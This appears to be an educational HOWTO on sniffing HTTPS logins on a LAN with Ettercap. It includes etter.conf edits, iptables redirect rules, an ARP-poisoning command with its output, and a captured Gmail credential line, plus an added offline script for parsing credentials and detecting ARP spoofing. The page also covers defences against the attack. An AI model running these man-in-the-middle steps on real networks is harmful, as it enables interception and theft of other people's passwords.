
Using Ettercap NG to capture SSL connections

Ettercap is a network monitoring tool (sniffer) that can be used for studying applications, forensic analysis and other purposes.
The aim of this article is to explain how to configure Ettercap so as to get the most out of it.
Article in English

*** WARNING : This HOWTO is for educational purposes only. Do NOT carry out the following steps on a LAN without permission. Doing so can land you in jail. ***

Sniffing SSL (HTTPS) traffic on a LAN with ettercap by means of a Man In The Middle (MITM) attack. Ettercap ARP-poisons the victim and the gateway so the victim's traffic flows through the attacker, uses iptables to redirect the victim's port 443 connections to its own SSL proxy, and presents the victim a forged certificate in place of the real one. Nothing is "broken" in SSL here: the attack relies on the victim accepting the forged certificate.

Step 1 :

nano /etc/etter.conf

Make the following change in the [privs] section. Setting both values to 0 stops ettercap from dropping to the nobody user after start-up; it has to stay root so that it can run the iptables commands below:

[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default

Uncomment the following two lines in the [redir_command] section (note the double dashes in --dport and --to-port; %iface, %port and %rport are filled in by ettercap at run time):

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Step 2 :

The victim's machine is at 192.168.1.100 and the router (gateway) is at 192.168.1.1. The attacker is at 192.168.1.115.

ettercap -TqM arp:remote /192.168.1.100/ /192.168.1.1/

Here -T selects the text interface, -q makes it quiet (no packet dump, only the dissected data such as credentials), and -M arp:remote performs ARP poisoning between the two target groups; the remote keyword is what allows traffic between the victim and hosts beyond the gateway to be intercepted. The output looks as follows:

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Dissector "dns" not supported (etter.conf line 72)
Listening on eth0… (Ethernet)

eth0 -> 08:00:27:FF:95:DB 192.168.1.115 255.255.255.0

Privileges dropped to UID 0 GID 0…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)…

* |=================================================>| 100.00 %

2 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : 192.168.1.100 70:1A:04:FF:0A:9A

GROUP 2 : 192.168.1.1 00:1E:10:FF:A7:E2
Starting Unified sniffing…

Text only Interface activated…
Hit 'h' for inline help

Step 3 :

At the victim's machine, open a browser such as Firefox and go to GMail. The browser warns about an untrusted certificate, because ettercap is presenting its own forged certificate instead of Google's. If the victim accepts the certificate, they are taken to the GMail login screen. Note that this step depends on the browser offering an override at all: browsers that enforce HSTS for the site, as current versions of Firefox and Chrome do for Google domains, show the error with no way to accept the certificate.

When the victim logs in to GMail, the username and password are logged on the attacker's machine. The display is similar to the following:

HTTP : 74.125.71.106:443 -> USER: samiux PASS: password INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/?ui=html&zy=l&bsv=llya694le36z&s

The captured credentials are USER: samiux and PASS: password.
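The following shell script is an added example; it is not part of the original HOWTO and not ettercap's own code. It works through the three steps above offline, on constructed text, so it needs no root and touches neither iptables nor the network: it expands the redir_command_on template from Step 1 into the exact iptables rule ettercap will run, checks that an etter.conf carries both Step 1 edits (against a constructed copy of the stock defaults and its patched version), extracts the credentials from a Step 3 log line, and, from the defender's side, flags the ARP poisoning of Step 2 by spotting one MAC behind two IPs in an arp -an listing. The listener port 59273 and the sample ARP tables are assumed and constructed values, not taken from the page.

```sh
#!/bin/sh
# Added example, not from the original HOWTO or from ettercap itself.
# Everything runs on constructed text: no root, no iptables, no live ARP traffic.

# Step 1: expand the redir_command_on template from etter.conf by hand to see
# the exact rule ettercap will hand to iptables. %iface, %port and %rport are
# ettercap's placeholders; the listener port used in the demo is an ASSUMED value.
render_redir_rule() {
    template='iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport'
    printf '%s\n' "$template" | sed -e "s/%iface/$1/" -e "s/%port/$2/" -e "s/%rport/$3/"
}

# Step 1: check an etter.conf on stdin for both edits: ec_uid/ec_gid = 0 (ettercap
# keeps root, which it needs to run iptables) and redir_command_on/off uncommented.
check_etter_conf() {
    conf=$(cat)
    for pattern in '^[[:space:]]*ec_uid[[:space:]]*=[[:space:]]*0([^0-9]|$)' \
                   '^[[:space:]]*ec_gid[[:space:]]*=[[:space:]]*0([^0-9]|$)' \
                   '^[[:space:]]*redir_command_on[[:space:]]*=.*iptables' \
                   '^[[:space:]]*redir_command_off[[:space:]]*=.*iptables'; do
        printf '%s\n' "$conf" | grep -Eq "$pattern" || return 1
    done
}

# Constructed etter.conf fragment with the stock defaults, and the same fragment
# after the Step 1 edits (applied with sed, the way one would script the change).
default_etter_conf() {
cat <<'EOF'
[privs]
ec_uid = 65534                # nobody is the default
ec_gid = 65534                # nobody is the default

[redir_command]
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
EOF
}
patched_etter_conf() {
    default_etter_conf | sed -e 's/^ec_uid = 65534/ec_uid = 0    /' \
                             -e 's/^ec_gid = 65534/ec_gid = 0    /' \
                             -e 's/^#redir_command/redir_command/'
}

# Step 3: pull USER, PASS and INFO out of an ettercap credential line like the
# one shown above; prints them space-separated on one line.
parse_ettercap_creds() {
    sed -n 's/^HTTP : .* -> USER: \([^ ]*\) *PASS: \([^ ]*\) *INFO: \(.*\)$/\1 \2 \3/p'
}

# Step 2, defender side: read `arp -an` (or `ip neigh`) output on stdin and report
# any MAC that answers for more than one IP. After the attack above the victim's
# table maps both the gateway and the attacker to the attacker's MAC. Prints one
# "SPOOF?" line per duplicated MAC and returns 1 if any was found.
detect_arp_spoof() {
    awk '
    {
        mac = ""; ip = ""
        for (i = 1; i <= NF; i++) {
            f = $i; gsub(/[()]/, "", f)
            if (f ~ /^[0-9A-Fa-f:]+$/ && split(f, p, ":") == 6) mac = toupper(f)
            else if (f ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) ip = f
        }
        if (mac != "" && ip != "") { ips[mac] = ips[mac] " " ip; n[mac]++ }
    }
    END {
        bad = 0
        for (m in n) if (n[m] > 1) { printf "SPOOF? %s claims%s\n", m, ips[m]; bad = 1 }
        exit bad
    }'
}

# Constructed `arp -an` listings as seen on the victim: poisoned (after Step 2) and clean.
poisoned_arp_table() {
cat <<'EOF'
? (192.168.1.1) at 08:00:27:ff:95:db [ether] on eth0
? (192.168.1.115) at 08:00:27:ff:95:db [ether] on eth0
? (192.168.1.50) at 00:11:22:33:44:55 [ether] on eth0
EOF
}
clean_arp_table() {
cat <<'EOF'
? (192.168.1.1) at 00:1e:10:ff:a7:e2 [ether] on eth0
? (192.168.1.115) at 08:00:27:ff:95:db [ether] on eth0
? (192.168.1.7) at <incomplete> on eth0
EOF
}

# Demo on the constructed data (59273 is an assumed example listener port).
render_redir_rule eth0 443 59273
patched_etter_conf | check_etter_conf && echo "etter.conf: Step 1 edits present"
printf '%s\n' 'HTTP : 74.125.71.106:443 -> USER: samiux PASS: password INFO: https://www.google.com/accounts/ServiceLogin' | parse_ettercap_creds
poisoned_arp_table | detect_arp_spoof || echo "victim ARP table looks poisoned"
```

The duplicate-MAC check is the quickest thing to run on a suspected victim: the gateway's MAC in the poisoned listing is the attacker's 08:00:27:FF:95:DB from the ettercap output above, not the router's 00:1E:10:FF:A7:E2, and the same MAC already sits behind 192.168.1.115. The check only sees the current table, so it misses an attacker that has already run redir_command_off and re-ARPed the hosts; for anything beyond a spot check, pin the gateway with a static ARP entry or use a switch feature such as dynamic ARP inspection.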

Remarks :

To remove the forged certificate that was accepted in Firefox on the victim's machine: "Edit" > "Preferences" > "View Certificate List" > "Servers". The certificates accepted during the test are listed there; delete them all, otherwise the browser will keep trusting the attacker's certificate for that site.